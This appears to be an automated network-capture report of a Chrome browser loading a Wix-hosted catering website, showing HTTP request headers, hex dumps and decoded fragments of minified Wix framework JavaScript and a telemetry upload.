                                                                                                                                                                                                                        Data Ascii: ?i.length&&(r[o]=i,i=[]):i.push(o);var s={};for(var c in t){if(r[c])for(a=0;a<r[c].length;a++){var l=r[c][a];s[r[c][a]]=n(l)}s[c]=n(c)}for(a=0;a<i.length;a++)s[i[a]]=n(i[a]);return s}(t,r);return Object.keys(i).forEach((function(o){var s=i[o];if((0,a.isVa
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 30 2c 61 70 70 65 61 72 3a 53 28 65 2c 22 61 70 70 65 61 72 22 2c 6e 29 2c 65 6e 74 65 72 3a 53 28 65 2c 22 65 6e 74 65 72 22 2c 6e 29 2c 65 78 69 74 3a 53 28 65 2c 22 65 78 69 74 22 2c 6e 29 7d 29 7d 29 29 29 3a 50 28 65 2c 69 2c 6f 29 2c 66 69 72 73 74 52 65 6e 64 65 72 3a 21 31 7d 7d 2c 6e 2e 68 61 6e 64 6c 65 45 78 69 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 52 28 74 68 69 73 2e 70 72 6f 70 73 2e 63 68 69 6c 64 72 65 6e 29 3b 65 2e 6b 65 79 20 69 6e 20 6e 7c 7c 28 65 2e 70 72 6f 70 73 2e 6f 6e 45 78 69 74 65 64 26 26 65 2e 70 72 6f 70 73 2e 6f 6e 45 78 69 74 65 64 28 74 29 2c 74 68 69 73 2e 6d 6f 75 6e 74 65 64 26 26 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 41 28
                                                                                                                                                                                                                        Data Ascii: 0,appear:S(e,"appear",n),enter:S(e,"enter",n),exit:S(e,"exit",n)})}))):P(e,i,o),firstRender:!1}},n.handleExited=function(e,t){var n=R(this.props.children);e.key in n||(e.props.onExited&&e.props.onExited(t),this.mounted&&this.setState((function(t){var n=A(
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 74 68 69 73 2e 75 70 64 61 74 65 53 74 61 74 75 73 28 21 30 2c 74 68 69 73 2e 61 70 70 65 61 72 53 74 61 74 75 73 29 7d 2c 6e 2e 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 75 6c 6c 3b 69 66 28 65 21 3d 3d 74 68 69 73 2e 70 72 6f 70 73 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 73 74 61 74 65 2e 73 74 61 74 75 73 3b 74 68 69 73 2e 70 72 6f 70 73 2e 69 6e 3f 6e 21 3d 3d 57 26 26 6e 21 3d 3d 7a 26 26 28 74 3d 57 29 3a 6e 21 3d 3d 57 26 26 6e 21 3d 3d 7a 7c 7c 28 74 3d 5a 29 7d 74 68 69 73 2e 75 70 64 61 74 65 53 74 61 74 75 73 28 21 31 2c 74 29 7d 2c 6e 2e 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 6e 6d 6f 75 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 63 61 6e 63 65 6c 4e 65 78
                                                                                                                                                                                                                        Data Ascii: this.updateStatus(!0,this.appearStatus)},n.componentDidUpdate=function(e){var t=null;if(e!==this.props){var n=this.state.status;this.props.in?n!==W&&n!==z&&(t=W):n!==W&&n!==z||(t=Z)}this.updateStatus(!1,t)},n.componentWillUnmount=function(){this.cancelNex


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        108192.168.2.55004634.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC641OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 1826
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1826OUTData Raw: 7b 22 6d 65 73 73 61 67 65 73 22 3a 5b 7b 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 66 75 6c 6c 41 72 74 69 66 61 63 74 49 64 22 3a 22 63 6f 6d 2e 77 69 78 70 72 65 73 73 2e 68 74 6d 6c 2d 63 6c 69 65 6e 74 2e 77 69 78 2d 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 6d 70 6f 6e 65 6e 74 49 64 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 22 3a 22 61 70 70 57 69 6c 6c 4c 6f 61 64 50 61 67 65 5f 70 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 48 61 6e 64 6c 65 72 22 2c 22 74 72 61 6e 73 61 63 74 69 6f 6e 41 63 74 69 6f 6e 22 3a 22 53 54 41 52 54 22 2c
                                                                                                                                                                                                                        Data Ascii: {"messages":[{"platform":"viewer","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","fullArtifactId":"com.wixpress.html-client.wix-thunderbolt","componentId":"thunderbolt","transactionName":"appWillLoadPage_pageTransitionsHandler","transactionAction":"START",
                                                                                                                                                                                                                        2025-01-10 13:53:10 UTC866INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        date: Fri, 10 Jan 2025 13:53:10 GMT
                                                                                                                                                                                                                        x-wix-responded-by: wix.monitoring.panorama.v1.log_entity:BulkLog:com.wixpress.monitoring.panorama
                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                        x-seen-by: jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLo+F8KZ7uABdI8Z0Rlna9UKWWveFEnegpnkLxzZh8fhS,rXUceJIlvIg2Ftogbhjv0HeP3S9fjSa3auU/TLxOJWlEQfi00LSS7LJu7sdkoLsDb0k6hR+N6PsQkUkhHcn2mg==,r6yY0ta7bIKrqK70x072lZfi+mOt7Vtg5VOAdCsTIYA=,bOnBQDOCjWxRPsoIciwTITtA7h2Bpn9Itm7TOinroW3jGkFuWNaRkE87MztHNrSCg/+ZGg+bPOrNLjAgpIrCBw==
                                                                                                                                                                                                                        x-wix-request-id: 1736517190.0185616075192431416956
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        109192.168.2.55005334.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:10 UTC626OUTGET /services/wix-thunderbolt/dist/group_5.22f6e4ec.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1163INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 32172
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: _q7XDbPOgHa3PnHYdL7DUs71XQW5JJVV
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 647762077 619178523
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 284893310
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:27 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274184
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:10 GMT
                                                                                                                                                                                                                        ETag: "a235f3eb11853b5304271883d16d1ccb"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC227INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 36 30 5d 2c 7b 35 33 34 36 36 3a 65 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 72 3d 65 2e 73 70 6c 69 74 28 74 2c 61 29 3b 69 66 28 72 2e 6c 65 6e 67 74 68 3d 3d 3d 61 29 7b 76 61 72 20 6e 3d 30 3b 6e 3d 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 3f 72 2e 6a 6f 69 6e 28 74 29 2e 6c 65 6e 67 74
                                                                                                                                                                                                                        Data Ascii: (self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[3660],{53466:e=>{"use strict";e.exports=function(e,t,a){var r=e.split(t,a);if(r.length===a){var n=0;n="string"==typeof t?r.join(t).lengt
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 68 3a 72 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 72 2c 6e 2c 6f 29 7b 76 61 72 20 73 3d 30 3b 72 65 74 75 72 6e 20 6f 2b 31 3c 61 26 26 28 73 3d 65 2e 73 6c 69 63 65 28 72 29 2e 6d 61 74 63 68 28 74 29 2e 73 68 69 66 74 28 29 2e 6c 65 6e 67 74 68 29 2c 72 2b 6e 2e 6c 65 6e 67 74 68 2b 73 7d 29 2c 30 29 2c 72 5b 61 2d 31 5d 2b 3d 65 2e 73 6c 69 63 65 28 6e 29 7d 72 65 74 75 72 6e 20 72 7d 7d 2c 33 36 36 37 33 3a 28 65 2c 74 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 64 65 66 61 75 6c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63
                                                                                                                                                                                                                        Data Ascii: h:r.reduce((function(r,n,o){var s=0;return o+1<a&&(s=e.slice(r).match(t).shift().length),r+n.length+s}),0),r[a-1]+=e.slice(n)}return r}},36673:(e,t,a)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){e.onmessage=func
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 6c 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 74 2b 72 2e 6d 65 73 73 61 67 65 44 65 6c 69 6d 69 74 65 72 2b 65 3a 65 7d 2c 74 2e 70 61 72 73 65 43 68 61 6e 6e 65 6c 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 69 6e 64 65 78 4f 66 28 72 2e 6d 65 73 73 61 67 65 44 65 6c 69 6d 69 74 65 72 29 3b 72 65 74 75 72 6e 2d 31 3d 3d 3d 74 3f 7b 69 64 3a 6e 75 6c 6c 2c 70 61 79 6c 6f 61 64 3a 65 7d 3a 7b 69 64 3a 65 2e 73 6c 69 63 65 28 30 2c 74 29 2c 70 61 79 6c 6f 61 64 3a 65 2e 73 6c 69 63 65 28 74 2b 31 29 7d 7d 2c 74 2e 63 6f 6e 73 74 72 75 63 74 43 6f 6e 6e 65 63 74 69 6f 6e 4d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 63 6f 6e
                                                                                                                                                                                                                        Data Ascii: elMessage=function(e,t){return t?t+r.messageDelimiter+e:e},t.parseChannelMessage=function(e){var t=e.indexOf(r.messageDelimiter);return-1===t?{id:null,payload:e}:{id:e.slice(0,t),payload:e.slice(t+1)}},t.constructConnectionMessage=function(e){return r.con
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 2c 74 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 6e 61 6d 65 3a 28 29 3d 3e 63 2e 55 2c 73 69 74 65 3a 28 29 3d 3e 6c 7d 29 3b 76 61 72 20 72 3d 61 28 37 39 34 33 35 29 2c 6e 3d 61 28 37 37 37 34 38 29 2c 6f 3d 61 28 38 37 37 31 31 29 2c 73 3d 61 28 32 30 35 39 30 29 2c 69 3d 61 28 39 38 33 32 33 29 2c 63 3d 61 28 39 30 31 38 29 3b 63 6f 6e 73 74 20 64 3d 28 30 2c 6e 2e 4f 67 29 28 5b 6f 2e 65 5a 2c 6f 2e 4a 69 2c 69 2e 6a 2c 28 30 2c 6e 2e 4b 54 29 28 73 2e 5f 4b 2c 63 2e 55 29 5d 2c 28 28 65 2c 74 2c 61 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 7b 74 72 61 6e 73 6c 61 74 69 6f 6e 73 3a 6f 7d 3d 6e 3b 72 65 74 75 72 6e 7b 6f 70 65 6e 28 6e 29 7b 61 2e 65 6e 61 62 6c 65 43 79 63 6c 69 63 54 61 62 62 69 6e
                                                                                                                                                                                                                        Data Ascii: e,t,a)=>{"use strict";a.r(t),a.d(t,{name:()=>c.U,site:()=>l});var r=a(79435),n=a(77748),o=a(87711),s=a(20590),i=a(98323),c=a(9018);const d=(0,n.Og)([o.eZ,o.Ji,i.j,(0,n.KT)(s._K,c.U)],((e,t,a,n)=>{const{translations:o}=n;return{open(n){a.enableCyclicTabbin
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 6f 28 29 2e 66 6f 72 45 61 63 68 28 74 2c 28 65 3d 3e 7b 72 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 65 29 7d 29 29 2c 61 2e 70 75 73 68 55 72 6c 53 74 61 74 65 28 72 29 7d 7d 29 7d 29 29 29 2c 70 3d 65 3d 3e 7b 65 28 72 2e 48 39 29 2e 74 6f 28 6c 29 7d 7d 2c 36 35 34 39 3a 28 65 2c 74 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 41 70 70 44 65 66 49 64 73 3a 28 29 3d 3e 76 2c 52 45 47 49 53 54 52 41 54 49 4f 4e 5f 52 45 53 55 4c 54 5f 53 54 41 54 55 53 5f 44 49 53 50 4c 41 59 3a 28 29 3d 3e 66 2c 52 6f 6c 65 3a 28 29 3d 3e 75 2c 55 73 65 72 45 72 72 6f 72 73 3a 28 29 3d 3e 79 2c 55 73 65 72 52 6f 6c 65 73 3a 28 29 3d 3e 49 2c 56
                                                                                                                                                                                                                        Data Ascii: e.location.href);o().forEach(t,(e=>{r.searchParams.delete(e)})),a.pushUrlState(r)}})}))),p=e=>{e(r.H9).to(l)}},6549:(e,t,a)=>{"use strict";a.r(t),a.d(t,{AppDefIds:()=>v,REGISTRATION_RESULT_STATUS_DISPLAY:()=>f,Role:()=>u,UserErrors:()=>y,UserRoles:()=>I,V
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 69 74 20 6f 28 65 2c 74 2c 61 3f 2e 63 6f 6e 74 61 63 74 49 6e 66 6f 2c 61 2e 70 72 69 76 61 63 79 53 74 61 74 75 73 7c 7c 63 2e 6c 53 2e 50 52 49 56 41 54 45 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 61 3f 2e 72 65 63 61 70 74 63 68 61 54 6f 6b 65 6e 29 3b 72 65 74 75 72 6e 7b 73 74 61 74 75 73 3a 73 2c 61 70 70 72 6f 76 61 6c 54 6f 6b 65 6e 3a 6e 2c 75 73 65 72 3a 72 7d 7d 2c 72 65 67 69 73 74 65 72 54 6f 55 73 65 72 4c 6f 67 69 6e 3a 64 2c 75 6e 52 65 67 69 73 74 65 72 54 6f 55 73 65 72 4c 6f 67 69 6e 3a 70 2c 72 65 67 69 73 74 65 72 54 6f 4d 65 6d 62 65 72 4c 6f 67 6f 75 74 3a 67 2c 75 6e 52 65 67 69 73 74 65 72 54 6f 4d 65 6d 62 65 72 4c 6f 67 6f 75 74 3a 75 2c 73 65 6e 64 53 65 74 50 61 73 73 77 6f 72 64 45 6d 61 69 6c 3a 49 2c 73 65 6e 64 46 6f
                                                                                                                                                                                                                        Data Ascii: it o(e,t,a?.contactInfo,a.privacyStatus||c.lS.PRIVATE,void 0,void 0,a?.recaptchaToken);return{status:s,approvalToken:n,user:r}},registerToUserLogin:d,unRegisterToUserLogin:p,registerToMemberLogout:g,unRegisterToMemberLogout:u,sendSetPasswordEmail:I,sendFo
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 64 20 69 73 20 61 77 61 69 74 69 6e 67 20 61 70 70 72 6f 76 61 6c 22 7d 28 79 7c 7c 28 79 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 77 69 78 43 6f 64 65 3d 22 36 37 35 62 62 63 65 66 2d 31 38 64 38 2d 34 31 66 35 2d 38 30 30 65 2d 31 33 31 65 63 39 65 30 38 37 36 32 22 2c 65 2e 73 68 6f 75 74 4f 75 74 3d 22 31 33 35 63 33 64 39 32 2d 30 66 65 61 2d 31 66 39 64 2d 32 62 61 35 2d 32 61 31 64 66 62 30 34 32 39 37 65 22 7d 28 76 7c 7c 28 76 3d 7b 7d 29 29 3b 63 6f 6e 73 74 20 77 3d 65 3d 3e 7b 65 28 72 2e 48 39 29 2e 74 6f 28 70 29 7d 7d 2c 31 38 33 33 37 3a 28 65 2c 74 2c 61 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 4d 61 73 74 65 72 50 61 67 65 54 70 61 50 72 6f 70 73 43 61 63 68 65 53 79
                                                                                                                                                                                                                        Data Ascii: d is awaiting approval"}(y||(y={})),function(e){e.wixCode="675bbcef-18d8-41f5-800e-131ec9e08762",e.shoutOut="135c3d92-0fea-1f9d-2ba5-2a1dfb04297e"}(v||(v={}));const w=e=>{e(r.H9).to(p)}},18337:(e,t,a)=>{"use strict";a.r(t),a.d(t,{MasterPageTpaPropsCacheSy
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 6e 73 74 20 6f 3d 28 65 5b 72 2e 77 69 64 67 65 74 49 64 5d 7c 7c 7b 7d 29 2e 61 70 70 44 65 66 69 6e 69 74 69 6f 6e 49 64 7c 7c 6e 2e 61 70 70 44 65 66 69 6e 69 74 69 6f 6e 49 64 7c 7c 22 22 2c 73 3d 74 2e 67 65 74 41 70 70 49 6e 73 74 61 6e 63 65 42 79 41 70 70 44 65 66 49 64 28 6f 29 3b 69 66 28 21 73 29 7b 63 6f 6e 73 74 20 65 3d 6e 65 77 20 45 72 72 6f 72 28 22 44 69 64 20 6e 6f 74 20 67 65 74 20 61 70 70 20 69 6e 73 74 61 6e 63 65 22 29 3b 65 2e 6e 61 6d 65 3d 22 54 70 61 4d 69 73 73 69 6e 67 41 70 70 49 6e 73 74 61 6e 63 65 22 2c 61 2e 63 61 70 74 75 72 65 45 72 72 6f 72 28 65 2c 7b 74 61 67 73 3a 7b 66 65 61 74 75 72 65 3a 22 66 65 61 74 75 72 65 2d 74 70 61 2d 63 6f 6d 6d 6f 6e 73 22 7d 2c 65 78 74 72 61 3a 7b 61 70 70 44 65 66 69 6e 69 74 69 6f
                                                                                                                                                                                                                        Data Ascii: nst o=(e[r.widgetId]||{}).appDefinitionId||n.appDefinitionId||"",s=t.getAppInstanceByAppDefId(o);if(!s){const e=new Error("Did not get app instance");e.name="TpaMissingAppInstance",a.captureError(e,{tags:{feature:"feature-tpa-commons"},extra:{appDefinitio
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 65 73 74 55 72 6c 3a 64 2c 76 69 65 77 4d 6f 64 65 3a 6c 2c 65 78 74 65 72 6e 61 6c 42 61 73 65 55 72 6c 3a 70 7d 3d 65 2c 67 3d 7b 74 61 72 67 65 74 3a 6e 75 6c 6c 2c 22 73 65 63 74 69 6f 6e 2d 75 72 6c 22 3a 6e 75 6c 6c 7d 3b 69 66 28 6e 2e 77 69 64 67 65 74 49 64 29 7b 63 6f 6e 73 74 7b 77 69 64 67 65 74 55 72 6c 3a 65 2c 6d 6f 62 69 6c 65 55 72 6c 3a 61 7d 3d 73 5b 6e 2e 77 69 64 67 65 74 49 64 5d 2c 69 3d 63 26 26 61 7c 7c 65 2c 64 3d 28 74 2e 67 65 74 28 72 29 3f 2e 63 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 65 6e 64 73 57 69 74 68 28 22 73 65 63 74 69 6f 6e 22 29 3b 6e 2e 69 73 53 65 63 74 69 6f 6e 26 26 64 26 26 28 22 73 69 74 65 22 3d 3d 3d 6c 3f 28 67 5b 22 73 65 63 74 69 6f 6e 2d 75 72 6c
                                                                                                                                                                                                                        Data Ascii: estUrl:d,viewMode:l,externalBaseUrl:p}=e,g={target:null,"section-url":null};if(n.widgetId){const{widgetUrl:e,mobileUrl:a}=s[n.widgetId],i=c&&a||e,d=(t.get(r)?.componentType||"").toLowerCase().endsWith("section");n.isSection&&d&&("site"===l?(g["section-url
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1390INData Raw: 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 22 72 65 73 6f 6c 76 65 22 2c 65 29 7d 29 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 22 72 65 6a 65 63 74 22 2c 65 2e 6d 65 73 73 61 67 65 7c 7c 65 29 7d 29 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 74 6f 70 4c 69 73 74 65 6e 65 72 26 26 74 68 69 73 2e 73 74 6f 70 4c 69 73 74 65 6e 65 72 28 29 7d 2c 65 7d 28 29 3b 63 6f 6e 73 74 20 4c 3d 28 30 2c 69 2e 4f 67 29 28 5b 28 30 2c 69 2e 4b 54 29 28 64 2e 59 47 2c 73 2e 55 55 29 5d 2c 28 28 7b 6d 65 74 61 53 69 74 65 49 64 3a 65 7d 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 7b 7d 2c 61 3d 28 65 2c 61 2c 72 29
                                                                                                                                                                                                                        Data Ascii: ).then((function(e){return d("resolve",e)})).catch((function(e){return d("reject",e.message||e)}))}))},e.prototype.stop=function(){this.stopListener&&this.stopListener()},e}();const L=(0,i.Og)([(0,i.KT)(d.YG,s.UU)],(({metaSiteId:e})=>{const t={},a=(e,a,r)


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        110192.168.2.55005234.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:10 UTC626OUTGET /services/wix-thunderbolt/dist/group_6.6ed6aac3.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:11 UTC1164INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 250949
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: WDEEiRvuPhfbNwzKqzA.W1n.c59_s8oc
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
